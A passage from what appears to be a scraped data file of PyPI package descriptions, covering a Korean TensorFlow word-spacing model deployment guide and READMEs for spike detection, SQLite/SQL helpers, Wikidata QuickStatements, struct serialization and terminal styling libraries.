\ud604\uc7ac \ubaa8\ub378 \ud30c\uc77c\uc740 \uc2e4\uc81c\ub85c\ub294pwd/saved_1pacer_model/1 \uc5d0 \uc800\uc7a5\ub418\uc5b4 \uc788\uc2b5\ub2c8\ub2e4.$curl-XPOSTlocalhost:8501/v1/models/spacer:predict\\-H\"Content-Type: application/json\"\\-d'{\"instances\":[\"\uadfc\ub370\uc774\uac83\uc880\ub744\uc6cc\uc8fc\uc2dc\uaca0\uc5b4\uc694!\", \"\uc2eb\uc740\ub370\uc601\u314e\u314e\"]}'{\"predictions\":[\"\uadfc\ub370 \uc774\uac83 \uc880 \ub744\uc6cc \uc8fc\uc2dc\uaca0\uc5b4\uc694!\",\"\uc2eb\uc740\ub370 \uc601\u314e\u314e\"]}\uc774\uc81c curl\uc744 \uc774\uc6a9\ud574 \ud14c\uc2a4\ud2b8\ud574\ubcf4\uba74 \uc815\uc0c1\uc801\uc73c\ub85c \ub744\uc5b4\uc4f0\uae30\uac00 \uc644\ub8cc\ub41c \ubb38\uc7a5\uc744 \ubc18\ud658\ud558\ub294 \uac83\uc744 \ubcfc \uc218 \uc788\uc2b5\ub2c8\ub2e4. signature function\uc744 \uc9c0\uc815\ud558\uba74 model_inference\ub9cc \ud558\ub294 \uac83\ub3c4 \uac00\ub2a5\ud569\ub2c8\ub2e4.Deploy using Tensorflowjs\ub2e4\uc74c\uc740 tensorflowjs\ub97c \uc774\uc6a9\ud574\uc11c \uc11c\ubc84\uac00 \uc544\ub2cc \ud074\ub77c\uc774\uc5b8\ud2b8\uc758 \ube0c\ub77c\uc6b0\uc800\uc5d0\uc11c \ucd94\ub860\ud558\ub3c4\ub85d\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4. \ub370\ubaa8\ud398\uc774\uc9c0\uc5d0 \uc788\ub294 \uac83\ub3c4 Tensorflow JS\ub97c \uc774\uc6a9\ud55c \uac83\uc785\ub2c8\ub2e4.Make TFJS Graph Modelpython-mscripts.convert_to_tfjsmodel\\--saved-model-path[saved_model_path]\\--output-path[output_dir_path]\uc774 \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 Tensorflow JS \ubaa8\ub378\ub85c \ubcc0\ud658\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\nTFJS\uc5d0\uc11c\ub3c4 \ubb38\uc7a5\uc744 \ub123\uace0 \ubb38\uc7a5\uc774 \ub098\uc624\ub3c4\ub85d \ub9cc\ub4e4\uace0 \uc2f6\uc5c8\uc9c0\ub9cc Vocab\uc744 \ud3ec\ud568\ud558\uace0 \uc788\ub294 signature function\uc740 TFJS\ub85c \ubcc0\ud658\ud558\ub294\ub370 \uc5d0\ub7ec\uac00 \ubc1c\uc0dd\ud558\uc5ec TFJS\uc5d0\uc120 \ubaa8\ub378 \ucd94\ub860\ub9cc \ud558\ub3c4\ub85d \ud588\uc2b5\ub2c8\ub2e4.\n\uc704 \ud30c\uc774\uc36c \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc774\uc6a9\ud558\uc9c0 \uc54a\ub354\ub77c\ub3c4tensorflowjs_wizard\ub098tensorflowjs_converter\uba85\ub839\uc5b4\ub97c \ubc14\ub85c \uc0ac\uc6a9\ud574\ub3c4 \ub429\ub2c8\ub2e4.Use Tensorflow JS Graph Modelhttps://js.tensorflow.org/api/latest/\ub97c \ucc38\uace0\ud558\uba74 js\ub85c \uc0ac\uc6a9\ud560 \uc218 \uc788\ub294 API\uac00 \uc815\ub9ac\ub418\uc5b4 \uc788\uc2b5\ub2c8\ub2e4.tfjs\ub97c \uc0ac\uc6a9\ud558\ub824\uba74https://www.tensorflow.org/js/tutorials/setup\uc5d0\ub098\uc640\uc788\ub294 \uac83\ucc98\ub7fc tensorflow js \ud30c\uc77c\uc744 \ub123\uc5b4\uc918\uc57c\ud569\ub2c8\ub2e4.\uc6b0\ub9ac\uac00 \uc704\uc5d0\uc11c \ub9cc\ub4e0 \uac74 tf.GraphModel\uc774\ubbc0\ub85ctf.loadGraphModel\ud568\uc218\ub85c \ubd88\ub7ec\uc640\uc11c \uc0ac\uc6a9\ud558\uba74 \ub429\ub2c8\ub2e4."} +{"package": "quickspider", "pacakge-description": "see github."} +{"package": "quickspikes", "pacakge-description": "quickspikesThis is a very basic but very fast window discriminator for detecting and\nextracting spikes in a time series. It was developed for analyzing extracellular\nneural recordings, but also works with intracellular data and probably many\nother kinds of time series.Here's how it works:The algorithm iterates through the time series. When the signal crosses the threshold (1) going away from zero, the algorithm then looks for a peak (2) that occurs within some number of samples from the threshold crossing. The number of samples can be adjusted to filter out broad spikes that are likely to be artifacts. If a peak occurs, its sample index is added to an array. These times can be used as-is, or they can be used to extract samples to either side of the peak for further analysis (e.g. spike sorting).The algorithm uses a streaming pattern (i.e., it processes chunks of data and keeps its state between chunks), so it's suitable for realtime operations. Many signals of interest will require highpass filtering to remove slow variations.Installation and UseThe algorithm is written in cython. You can get a python package from PyPI:pip install quickspikesOr to build from a copy of the repository:pip install .To detect peaks, you instantiate the detector with parameters that match the events you want to detect, and then send the detector chunks of data. For example, an extracellular recording at 20 kHz stored in 16-bit integers may have a noise floor around 2000, and the spikes will be on the order of 20 samples wide:importquickspikesasqsdet=qs.detector(1000,30)times=det.send(samples)You can continue sending chunks of data by callingsend(). The detector will keep its state between calls, so you can detect spikes that occur on chunk boundaries. For example, if you're receiving data from some kind of generator, you could use a pattern like this:forchunkinmy_data_generator():times=det.send(chunk)# process timesConversely, if the data are not contiguous, you should reinitialize the detector for each chunk.You can adjust the detector's threshold at any point, for example to compensate for shifts in the mean and standard deviation of the signal:reldet=qs.detector(2.5,30)reldet.scale_thresh(samples.mean(),samples.std())times=reldet.send(samples)To detect negative-going events, you'll need to invert the signal.There are also some functions you can use to extract and align spike waveforms. Given a list of times returned from thedetector.send()method, to extract waveforms starting 30 samples before the peak and ending 270 samples after:f_times=qs.filter_times(times,30,samples.size-270)spikes=qs.peaks(samples,f_times,30,270)times,aligned=qs.realign_spikes(f_times,spikes,upsample=3,jitter=4)Note that the list of event times may need to be filtered to avoid trying to access data points outside the bounds of the input time series. If you care about these events, you'll need to pad your input signal. Therealign_spikesfunction uses a sinc-based resampling to more accurately locate the peak of the event.There is also a reference copy of an ANSI C implementation and anf2pywrapper inf2py/. This algorithm is slightly less efficient and flexible, but may give better results if included directly in a C codebase.Intracellular spikesThere are some specialized tools for working with intracellular data.\nIntracellular recordings present some special challenges for detecting spikes.\nThe data are not centered, and spike waveforms can change over the course of\nstimulation. The approach used here is to find the largest spike in the recording,\n(typically the first) and locate the onset of the spike based on when the derivative begins to rapidly increase. The peak and onset are used to set a threshold for extracting subsequent spikes.The following is an example for a recording at 50 kHz of a neuron with spikes that have a rise time of about 1 ms (50 samples). Spikes waveforms will start 7 ms before the peak and end 40 ms after, and will be trimmed to avoid any overlap with subsequent spikes.fromquickspikes.intracellularimportSpikeFinderdetector=SpikeFinder(n_rise=50,n_before=350,n_after=2000)detector.calculate_threshold(samples)times,spikes=zip(*detector.extract_spikes(samples,min_amplitude=10))LicenseFree for use under the terms of the GNU General Public License. See [[COPYING]]\nfor details.If you use this code in an academic work, citations are appreciated. There is no methods paper describing the algorithm, but the most relevant reference is:C. D. Meliza and D. Margoliash (2012). Emergence of selectivity and tolerance in the avian auditory cortex. Journal of Neuroscience, doi:10.1523/JNEUROSCI.0845-12.2012"} +{"package": "quicksplit", "pacakge-description": "No description available on PyPI."} +{"package": "quick-sql", "pacakge-description": "#Quick SqlIt's a python library written purely in Python to do faster and better sqlite operationsWhy Quick Sqlite?No need to write such a lengthy SQL code.No need to create custom function for query.Best for lightweight and simpleSqlite3operationsNew features almost every week :)Main ContentsDatabase()Class containing methods and Sqlite operations.create_table()Function use to create table.insert()Function use to insert data.select_all()Function use to select all data from a column.select_from()Function use to select data from a single row.update()Function use to update data.delete()Function use to delet row.Database()ClassThis is the class which is responsible for database creation and all the operation under a database.Database(db_name)ParametersIt takes one parameter.db_nameMust be endswith \".db\" extensionExamplesHere is an exampleClick here!Database.create_table()FunctionThis is the function which is used to create table in databaseDatabase.create_table(table_name,**kwargs)ParametersIt takes 1 or more parameterstable_nameName of the table you want to be in your databasekwargs must be in the formcolumn_name = dtypeDtype must be valid sqlite datatype.ReturnNoneExamplesHere is an exampleClick here!Database.insert()FunctionThis function is used to insert data in table.Database.insert(table_name,column,data_to_insert)ParametersIt takes 3 parameterstable_nameName of the table in which you want to insert data.columnsName of the column in which you want to insert data.Must be list.data_to_insertData which you want to insert.Must be listNotelen(column)must be equal tolen(data_to_insert)column[0]will store the data which is atdata_to_insert[0]ReturnNoneExamplesHere is an exmaple.Click here!Database.select_all()FunctionThis function is used to select all the data from a given columnDatabase.select_all(table_name,column,fetch=\"single\")ParametersIt takes 3 parameters , 2 are must and other is optionaltable_nameName of the table from which you want to get or select data.columnName of the column.fetchThis depend upon you if you want tofetchall()use \"all\" otherwise \"single\".Default is \"single\"ReturnTupleExamplesHere is an example.Click here!Database.select_from()FunctionThis function is used to select data from a particular row.Database.select_from(table_name,column,from_where,fetch=\"single\")ParametersIt takes 4 parameter, 3 are must and other is optionaltable_nameName of the table from which you want to get or select data.columnName of the column.from_whereIt is the list of value and a pair from where you want to get data.fetchThis depend upon you if you want tofetchall()use \"all\" otherwise \"single\".Default is \"single\"Notelen(from_where)should be equals to 2from_where[0]should be a column name andfrom_where[1]should be the value of that column which belongs to a row.ReturnTupleExamplesHere is an example.Click here!Database.update()FunctionThis function is use to update data of table.Database.update(table_name,column,value,from_where)ParametersIt takes 4 parameters.table_nameThe table in which you want to update data.columnColumn name.Must be a list.valueValue which going to be store in that.Must be a list.from_wherePair of column and value.Must be a list.Notelen(column)==len(value)column[0]store the data invalue[0]ReturnNoneExamplesHere is an example.Click here!Database.delete()FunctionThis function is use to update data of table.Database.update(table_name,from_where)ParametersIt takes 2 parameters.table_nameThe table in which you want to delete data.from_wherePair of column and value.ReturnNoneExamplesHere is an example.Click here!"} +{"package": "quicksqlconnector", "pacakge-description": "Developers are struggling to execute a query and what if you need to execute another query somewhere else? That's a lot of code to rewrite again. You don't have to do this because QuickSQLConnector got you covered!.Quick SQL Connectoris a python library that lets you execute MySQL, PostgreSQL, and SQLite queries with just one line of code.Reducing 80% lines of code and get more done and it's all done in the same syntax with all SQL databases mentioned.Installation \ud83d\udcbfUSING PIPpip install quicksqlconnectorFOR LINUX FRIENDSpython3 pip install quicksqlconnectorTo update Quick SQL Connector to the latest version, add --upgrade flag to the above commands.Write your first query.Use 'quicksqlconnector' keyword to importfrom quicksqlconnector import quicksqlconnectorCreating instance of moduleDB = quicksqlconnector('database','host', port, 'username', 'password')\n\nNOTE : If you're using SQLite, you must provide database file name as follows.\n\nDB = quicksqlconnector('sqlite3', database_name='my_example_database')For database, it has 3 options (case-sensitive).mysqlsqlite3postgresquicksqlconnector only have one method which is 'query'.DB.query('query','parameters:optional')\n\nFOR SQLite, you don't need to use parameterized quieries as it is not supported in SQLite.It has two arguments, query and parameters, parameters are optional.# EXAMPLES FOR 'MYSQL'\n\nDB.query(\"SELECT * FROM test where id= %s\", (input_user,))\nDB.query(\"SELECT * FROM test\")\nDB.query('CREATE TABLE test(name varchar(10), id int(10))')\nDB.query(\"INSERT INTO test values(%s, %s)\", ('harry', 13))\n\n# EXAMPLES FOR 'SQLITE'\n\nDB.query('DROP TABLE movie')\nDB.query(\"CREATE TABLE movie(title varchar(1), year int(1), score int(1))\")\n\n# EXAMPLE FOR 'POSTGRESQL'\n\nDB.query('SELECT datname FROM pg_database')Seetest.pyformore examples.\ud83d\udd17Useful LinksRouteLinkBuy me a CoffeeVisitEmailVisitPyPiVisitWebsiteVisit"} +{"package": "quick-sqlite", "pacakge-description": "quick_sqliteQuickSqlite helps you work with sqlite3 databases in a much easier way.\nIt is simple and easy to use. You will not have to repeatedly write sql statements.\nThis will also improve your productivity by recognizing what's happening because of informative function names.Installationpip install quick_sqliteRead more in the documentationhere"} +{"package": "quick-sqlite-database", "pacakge-description": "No description available on PyPI."} +{"package": "quick-start", "pacakge-description": "QuickStartCria um projeto baseado em um modeloInstala\u00e7\u00e3oLinux:$pythonsetup.pyinstall--user$~/.local/bin/quickstart_installerExemplo de uso$pyinitnome_do_projetoConfigura\u00e7\u00e3o para Desenvolvimentopythonsetup.pydevelopHist\u00f3rico de lan\u00e7amentos* Trabalho em andamentoMetaSeu Nome \u2013@ztzandre\u2013andreztz@gmail.comDistribu\u00eddo sob a licen\u00e7a XYZ. VejaLICENSEpara mais informa\u00e7\u00f5es.https://github.com/andreztz/quick-install"} +{"package": "quickstart-django", "pacakge-description": "Quickstart_djangoA small python package which will help you to quickly start your django project. It will create a django project with all the necessary files and folders in just single command.Istallationpy-mpipinstallquickstart-djangoUsagepy-mquickstart_djangoproject_nameapplication_nameRun LocallyInstall dependenciespy-mpipinstallDjangoClone the projectgitclonehttps://github.com/jaythorat/quickstart_djangoExecute the commandpy./quickstart_django/src/quickstart_django/quickstart_django.pyproject_nameapplication_nameThis will create a working django application with all the initial setup which is needed to run the app. Just change directory to project directory and runpy manage.py runserverAuthors@jaythorat"} +{"package": "quickstarter", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickstartlog", "pacakge-description": "A simple log utility, write log into console & file(TimedRotatingFileHandler)Examplesmain.py:import quickstartlog as qslog\nqslog.debug('this is debug')\nqslog.info('this is info')\nqslog.warn('this is warning')\nqslog.error('this is error')\nqslog.info_ex(qslog.LIGHT_GREEN)('this is info with LIGHT_GREEN')console output & ./var/log/main.log:[19:30:07 INFO ] this is info\n[19:30:07 WARNI] this is warning\n[19:30:07 ERROR] this is error\n[19:30:07 INFO ] this is info with LIGHT_GREEN"} +{"package": "quickstartup", "pacakge-description": "DocumentationQuickstartup package used byQuickstartup TemplateScreenshotsLanding PageLanding PageSignup FormSignup form (you can easily customize it)Signin FormSignin formReset PasswordReset PasswordContact FormContact FormSample AppSample Application showing user profile editorHistory0.19.0Add missing migration scripts0.18.0Upgrade bootstrap to 4.5.2Remover tether requirementFix issue #34 error in expiration time in emails0.17.1Fix token expiration settings0.17.0Requires Django 3.1Update requirementsFix and remove warningsChange token expiration config to use seconds instead of days0.16.2Add PermissionMixin to the base User model (#38 thanks to @shahabaz)0.16.1Small fix in documentationFix tox envlist0.16.0Update Django requirementsUpdate Django support to 3.0 major release0.15.1Update Django requirementsReplace default Django unittest with pytest0.14.1Fix Django requirement rule0.14.0Update requirements for Django 2.1 and fixes deprecation-related issues0.13.0Update codebase to work with Django 2Update third-party requirements0.12.3Remove explicit reference to view that coud be inexistentAdd vertical normal size include fieldsAdd a missing \u2018safe\u2019 mark on error message0.12.2Fix some issues with field includes adding safe filter in help/error\nmessages0.12.1Fix a minor CSS class issue in app.html navbar0.12.0Update middleware implementation to make it Django 1.10 format0.11.0Remove dj-{static,media} and add log-setting helper0.10.2Update more requirements0.10.1Update to Django 1.10.2Update to bootstrap4-alphaUpdate other requirements and fix templates0.9.5Update requirements.txt (using pur)Use py35 for tests in tox0.9.4Update django-ipware version requirementAdd Py3.5 in setup.py classifiers0.9.3Update requirements0.9.2Update translations0.9.1Add Django password validators in all password-related forms.0.9.0Breaks everythingRename apps with prefixqs_*to avoida conflicts with user\u2019s appsRemove django-registration dependency0.6.0Improve Contact model representation string (eg. John Doe )Addipof user at contact application.0.5.7Replacenoreply@{domain} with PROJECT_CONTACT to enable\ntests on localhost (some SMTP servers does not accept this hostname)0.5.6Fix an blocker bug in import on contact app0.5.5Fixes and improvements in contact app (mainly in e-mail sending code)0.5.4Update requirements versions0.5.3Small refactor in footer_links block0.5.2Sticky footer!Add a block structure start_body after tag (for some analytics scripts)0.5.1Fix remaining formatting issues in some templates0.5.0Finish templates and static reorganization0.4.4More templates & static refactorings to make customization easy0.4.3Make signup form template overridable0.4.2Update messages and tranlations0.4.1Fix broken testAdd some screenshots in README.rst0.4.0Add one more template layer to make easy template overrideUpdate django-widget-tweak requirement version to 1.4.1Update app new visualFix some visual issues (like textarea resize handle in contact form)Reset password, now, redirect to Sign in form with a flash message instructions\ninstead of an specific page and fix message tag colors0.3.0New website visual0.2.7Add block to allow bootstrap navbar CSS classes configuration0.2.6CRITICAL: Add missing lib static files0.2.5Fix a release number issue0.2.4Move logo image to static root0.2.2Fix a bug on template_name configuration on profile-related views0.2.1Add missing migration script requirement0.2.0Consolidate migration scripts (break migration from projects with 0.1.X versions)Update and compile pt_BR translations0.1.9New settings for custom ProfileForm configuration0.1.8Remove django-nose requirement and use Django test runner instead.Reorganize Form classes in filesReorganize and split some test filesCode coverage: 89% (target: ~98%)Remove unused code in BaseUserManagerPEP8 and cosmetic fixesFix some requirements(-test).txt errors0.1.7Use Django Nose test runner with a \u201ctestproject\u201dFix a issue in template loader that forces quickstartup templates over application templates.Fix a Site database loading error during tests (table missing)0.1.6Update translations0.1.5Include translations0.1.4Bump Release number to fix a release error0.1.3Fix(?) again README.rst to enable rendering on PyPI0.1.2Fix(?) README.rst to enable rendering on PyPI0.1.1Remove boilerplate (incorrect) informations from README.rstAdd \u201cversion\u201d command into setup.py0.1.0First release on PyPI."} +{"package": "quickstartutil", "pacakge-description": "A simple utility for building application quickly.Examples"} +{"package": "quickstart-vdk", "pacakge-description": "Quickstart-VDKThis is the first VDK packaging that users would install to play around with.It packages:Plugin for a local database to get started quicklyPlugin for job management (vdk-control-cli)Plugin for local Control Service installation (vdk-server)See alsoVersatile Data Kit Getting Started."} +{"package": "quickstatements", "pacakge-description": "quickstatementsA python module for reconciling datasets to quickstatements / Wikidata format.It is still in an inception/pre-prototyping stage. For more info, check theWiki.Protoype branchThe tracer branch is dedicated to a few prototypes to play around before actually having a workable version of the package.The idea is to document on the repository Wiki alongside the development of the prototypes."} +{"package": "quickstatements-client", "pacakge-description": "QuickStatements ClientA data model and client for WikidataQuickStatements.\ud83d\udcaa Getting StartedHere's how to quickly construct some QuickStatementsimportdatetimefromquickstatements_clientimportDateQualifier,EntityQualifier,TextQualifier,EntityLinesubject_qid=\"Q47475003\"# Charles Tapley Hoytsubject_orcid=\"0000-0003-4423-4370\"reference_url_qualifier=TextQualifier(predicate=\"S854\",target=f\"https://orcid.org/0000-0003-4423-4370\")start_date=datetime.datetime(year=2021,day=15,month=2)start_date_qualifier=DateQualifier.start_time(start_date)position_held_qualifier=EntityQualifier(predicate=\"P39\",target=\"Q1706722\")employment_line=EntityLine(subject=subject_qid,predicate=\"P108\",# employertarget=\"Q49121\",# Harvard medical schoolqualifiers=[reference_url_qualifier,start_date_qualifier,position_held_qualifier],)>>>employment_line.get_line()'Q47475003|P108|Q49121|S854|\"https://orcid.org/0000-0003-4423-4370\"|P580|+2021-02-15T00:00:00Z/11|P39|Q1706722',How to send some QuickStatements to the API:fromquickstatements_clientimportQuickStatementsClientlines=[employment_line,...]client=QuickStatementsClient(token=...,username=...)res=client.post(lines,batch_name=\"Test Batch\")# see also res.batch_idimportwebbrowserwebbrowser.open_new_tab(res.batch_url)Note:tokenandusernameare automatically looked up withpystowif they aren't given.\nSpecifically, usingpystow.get_config(\"quickstatements\", \"token)andpystow.get_config(\"quickstatements\", \"username\").\ud83d\ude80 InstallationThe most recent release can be installed fromPyPIwith:$pipinstallquickstatements_clientThe most recent code and data can be installed directly from GitHub with:$pipinstallgit+https://github.com/cthoyt/quickstatements-client.git\ud83d\udc50 ContributingContributions, whether filing an issue, making a pull request, or forking, are appreciated. SeeCONTRIBUTING.mdfor more information on getting involved.\ud83d\udc4b AttributionThis code was originally written as a contribution toPyORCIDator.\nSpecial thanks to Tiago Lubiana [@lubianat] and Jo\u00e3o Vitor [@jvfe] for discussions and testing.\u2696\ufe0f LicenseThe code in this package is licensed under the MIT License.\ud83c\udf6a CookiecutterThis package was created with@audreyfeldroy'scookiecutterpackage using@cthoyt'scookiecutter-snekpacktemplate.\ud83d\udee0\ufe0f For DevelopersSee developer instructionsThe final section of the README is for if you want to get involved by making a code contribution.Development InstallationTo install in development mode, use the following:$gitclonegit+https://github.com/cthoyt/quickstatements-client.git\n$cdquickstatements-client\n$pipinstall-e.\ud83e\udd7c TestingAfter cloning the repository and installingtoxwithpip install tox, the unit tests in thetests/folder can be\nrun reproducibly with:$toxAdditionally, these tests are automatically re-run with each commit in aGitHub Action.\ud83d\udcd6 Building the DocumentationThe documentation can be built locally using the following:$gitclonegit+https://github.com/cthoyt/quickstatements-client.git\n$cdquickstatements-client\n$tox-edocs\n$opendocs/build/html/index.htmlThe documentation automatically installs the package as well as thedocsextra specified in thesetup.cfg.sphinxplugins\nliketexextcan be added there. Additionally, they need to be added to theextensionslist indocs/source/conf.py.\ud83d\udce6 Making a ReleaseAfter installing the package in development mode and installingtoxwithpip install tox, the commands for making a new release are contained within thefinishenvironment\nintox.ini. Run the following from the shell:$tox-efinishThis script does the following:UsesBump2Versionto switch the version number in thesetup.cfg,src/quickstatements_client/version.py, anddocs/source/conf.pyto not have the-devsuffixPackages the code in both a tar archive and a wheel usingbuildUploads to PyPI usingtwine. Be sure to have a.pypircfile configured to avoid the need for manual input at this\nstepPush to GitHub. You'll need to make a release going with the commit where the version was bumped.Bump the version to the next patch. If you made big changes and want to bump the version by minor, you can\nusetox -e bumpversion -- minorafter."} +{"package": "quickstats", "pacakge-description": "SetupClone the repository:git clone ssh://git@gitlab.cern.ch:7999/clcheng/quickstats.git1. CERN UserTo set up from lxplus, just dosource setup.sh2. Genearl UserTo set up locally, make sure you have pyROOT 6.24+ installed (using conda is recommended), and dopip install quickstatsInstalling pyROOTSimplest way to install pyROOT is via condaconda install -c conda-forge ROOTImportant: First-time compilationTo compile c++ dependencies, do this for first time usequickstats compileCommand Line ToolsRun Nuisance Parameter Pulls and Rankingquickstats run_pulls -i -d -p --poi --parallel -1 -o The following options are availableOptionDescriptionDefault-i/--input_filePath to the input workspace file--w/--workspaceName of workspace. Auto-detect by default.None-m/--model_configName of model config. Auto-detect by default.None-d/--dataName of dataset\"combData\"-p/--parameterNuisance parameter(s) to run pulls on. Multiple parameters are separated by commas. Wildcards are accepted. All NPs will be run over by default\"\"-x/--poiPOIs to measure. If empty, impact on POI will not be calculated.\"\"-r/--profileParameters to profile\"\"-f/--fixParameters to fix\"\"-s/--snapshotName of initial snapshot\"nominalNuis\"-o/--outdirOutput directory\"pulls\"-t/--minimizer_typeMinimizer type\"Minuit2\"-a/--minimizer_algoMinimizer algorithm\"Migrad\"-c/--num_cpuNumber of CPUs to use per parameter1--binned/--unbinnedWhether to use binned likelihoodTrue-q/--precisionPrecision for scan0.001-e/--epsTolerance1.0-l/--log_levelLog level\"INFO\"--eigen/--no-eigenCompute eigenvalues and vectorsFalse--strategyDefault fit strategy0--fix-cache/--no-fix-cacheFix StarMomentMorph cacheTrue--fix-multi/--no-fix-multiFix MultiPdf level 2True--offset/--no-offsetOffset likelihoodTrue--optimize/--no-optimizeOptimize constant termsTrue--max_callsMaximum number of function calls-1--max_itersMaximum number of Minuit iterations-1--parallelParallelize job across different nuisanceparameters using N workers. Use -1 for N_CPU workers.0--cache/--no-cacheCache existing resultTrue--excludeExclude NPs (wildcard is accepted)\"\"Plot Nuisance Parameter Pulls and Rankingquickstats plot_pulls --helpLikelihood Fit (Best-fit)quickstats likelihood_fit --helpRun Likelihood Scanquickstats likelihood_scan --helpAsymptotic CLs Limitquickstats cls_limit --helpCLs Limit Scanquickstats limit_scan --helpGenerate Asimov datasetquickstats generate_standard_asimov --helpInspect Workspacequickstats inspect_workspace --helpCreate Workspace from XML Cardsquickstats build_xml_ws --helpModify Workspace from XML Cards or Json Configquickstats modify_ws --helpCombine Workspace from XML Cards or Json Configquickstats combine_ws --helpCompare Workspacesquickstats compare_ws --helpRun Event Loop from Custom Config Filequickstats process_rfile --help"} +{"package": "quickstep", "pacakge-description": "No description available on PyPI."} +{"package": "quickstockdata", "pacakge-description": "QuickStockDataA python module that returns stock price data and stock symbols.InstallationInstallquickstockdatausingpip:$ pip install quickstockdataDescription of functionsget_prices :Input:symbol: Symbol of stock (string)intv: Interval of time (string, optional, default=1d)rng: Range of time (string, optional, default=1wk)intvandrngboth takes values from1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1moand3mo.ohlc: Specify High, Low, Open and Close prices (string, optional, default='high')stock_exc: specify stock exchange to get data from (string, optional, default='nse')Output:\nlist: A list of lists containing the timestamp and corresponding price for each data point.get_nse_symbols :Input: NoneOutput: A list of dictionaries containing the stock names and symbols of nse.get_nasdaq_symbols :Input: NoneOutput: A list of dictionaries containing the stock names and symbols of nasdaq.find_nse_stock :Input:search_term: search term to search for stock symbol in nse (string)Output: A list of dictionaries containing the stock names and symbols of nse.find_nasdaq_stock :Input:search_term: search term to search for stock symbol in nse (string)Output: A list of dictionaries containing the stock names and symbols of nasdaq."} +{"package": "quickstruct", "pacakge-description": "QuickStructQuickStruct is a small library written in Python that allows you to\neasily create C structs (and a bit more dynamic stuff) in Python!It's fairly easy to usefromquickstructimport*classPerson(DataStruct):name:Stringage:i8Structs can also be composedclassTeachingClass(DataStruct):teacher:Person# We use Array[T] to make it dynamic sizedstudents:Array[Person]And structs can also inherit other structs\n(we even support multiple inheritance!)classEmployee(Person):salary:i32Now let's use the structs we defined# We have 2 options when initializing.# Either by setting each attribute individuallyperson=Person()person.name=\"John Doe\"person.age=42# Or by passing them as keyword argumentsperson=Person(name=\"John Doe\",age=42)The main use for C structs is to convert them from bytes and backdata=person.to_bytes()# Do something with the data# And it's also easy to deserializeperson=Person.from_bytes(data)When deserializing a struct with multiple bases or if one of the fields was overriden,\nthe deserialization must be done through the exact type of the struct.Fixed Size StructsA fixed size struct is any struct that has a known fixed size at build time that doesn't depend on the\ndata it holds. QuickStruct can verify a struct has a fixed size.# The StructFlags.FixedSize flag is used to verify the struct has a fixed size.# If the size could not be verified, a SizeError is raised.classFixedSizeStruct(DataStruct,flags=StructFlags.FixedSize):a:i32b:i8c:f32d:chare:String[10]# 10 character stringf:Person[3]# 3 'person' objects# g: Array[i32] <- not a fixed size field. this will errorStruct PropertiesIt is possible to query some information about a structure.fromquickstructimport*classFixed(DataStruct):s:String[10]x:i32classDynamic(DataStruct):s:Stringx:i32print(\"Fixed.size:\",Fixed.size)# 16 (padding automatically added)print(\"Dynamic.size:\",Dynamic.size)# -1 (dynamic size)print(\"Fixed.is_fixed_size:\",Fixed.is_fixed_size)# Trueprint(\"Dynamic.is_fixed_size:\",Dynamic.is_fixed_size)# Falseprint(\"Fixed.is_dynamic_size:\",Fixed.is_dynamic_size)# Falseprint(\"Dynamic.is_dynamic_size:\",Dynamic.is_dynamic_size)# Trueprint(\"Fixed.fields:\",Fixed.fields)# [s: String[10], __pad_0__: Padding(2), x: i32]print(\"Dynamic.fields:\",Dynamic.fields)# [s: String, x: i32]print(\"Fixed.alignment:\",Fixed.alignment)# 16.print(\"Dynamic.alignment:\",Dynamic.alignment)# -1 (no alignment because dynamic struct can't be aligned).print(\"Fixed.is_final:\",Fixed.is_final)# Falseprint(\"Dynamic.is_final:\",Dynamic.is_final)# Falseprint(\"Fixed.is_protected:\",Fixed.is_protected)# Falseprint(\"Dynamic.is_protected:\",Dynamic.is_protected)# FalseAlignmentIt is also possible to add padding to the struct. There are 2 ways to do that:Manual AlignmentThis can be done with thePaddingtype.classAlignedStruct(DataStruct):c1:char# This adds a single byte padding_pad0:Paddingshort:i16# We can also add multi-byte padding# Here we'll pad to get 8 byte alignment (missing 4 bytes)_pad1:Padding[4]Automatic AlignmentThis can done by passing some flags to the class definition. By default the struct is automatically aligned.# Aligned on 2 byte boundaryclassAlignedStruct(DataStruct,flags=StructFlags.Align2Bytes):c1:char# Padding will be added hereshort:i16Struct FlagsFlagDescriptionDefaultThe default to use if no flags are given. Same asAllowOverride | AlignAuto.NoAlignmentThis is the most packed form of the struct. All fields are adjacent with no padding (unless manually added)PackedSame asNoAlignmentexcept thatNoAlignmentis a bit more optimized because no alignment is done.Align1ByteSame asPackedAlign2BytesAligns the fields on 2 byte boundary.Align4BytesAligns the fields on 4 byte boundary.Align8BytesAligns the fields on 8 byte boundary.AlignAutoAligns the fields by their type.ReorderFieldsSpecifies the fields should be reordered in order to make the struct a little more compressed.ForceDataOnlyDeprecated. Specifies that the struct may only contain serializable fields. Data-only structs may only inherit data-only structs.AllowOverrideIf set, fields defined in the struct may override fields that are defined in the base struct.TypeSafeOverrideIf set, when fields are overridden, they must have the same type (which would make it pretty useless to override). ImpliesAllowOverride. If fields have a different type, anUnsafeOverrideErroris raised.ForceSafeOverrideDeprectaed. Same asTypeSafeOverride.FixedSizeIf set, the struct must have a fixed size. If not, an exceptionSizeErroris raised.ForceFixedSizeDeprecated. Same asFixedSize.AllowInlineDeprecated. If set, the struct's fields will be inlined into another struct the contains this struct.ProtectedIf set, denies any overrides of that structure. If a struct is trying to override a field of it, anUnoverridableFieldErroris raised.LockedStructureDeprecated. Same asProtected.FinalMarks the structure so it won't be inheritable by any other class. If a struct is trying to inherit it, anInheritanceErroris raised."} +{"package": "quickstructures", "pacakge-description": "UNKNOWN"} +{"package": "quick-styles", "pacakge-description": "quick_stylesAn unbelievably lightweight Python library for effortlessly applying ANSI escape color & style codes to Windows CMD and other ANSI-supported terminalsDescriptionquick_styles enhances the experience of using the current unintuitive ANSI escape code system for text styling in Python. With quick_styles, you can easily generate ANSI codes with set parameters, save styles for future use, and implement custom codes for personalized styles.DownloadFrom PyPI usingpip:pipinstallquick-stylesUsageExample programBefore we proceed to the explict info regarding the library's functionality, here's a preview of the core functions of quick_styles to get a sense of its capabilities:importquick_stylesasqsprint(\"Hi there! I'm a boring print statement. By default, I am unable to be styled and my appearance is immutable. \"\"Womp womp!\")print(\"\\033[34mTypically, you would have to manually surround me with ANSI escape codes. Not only is this method of \"\"styling tedious, but also makes 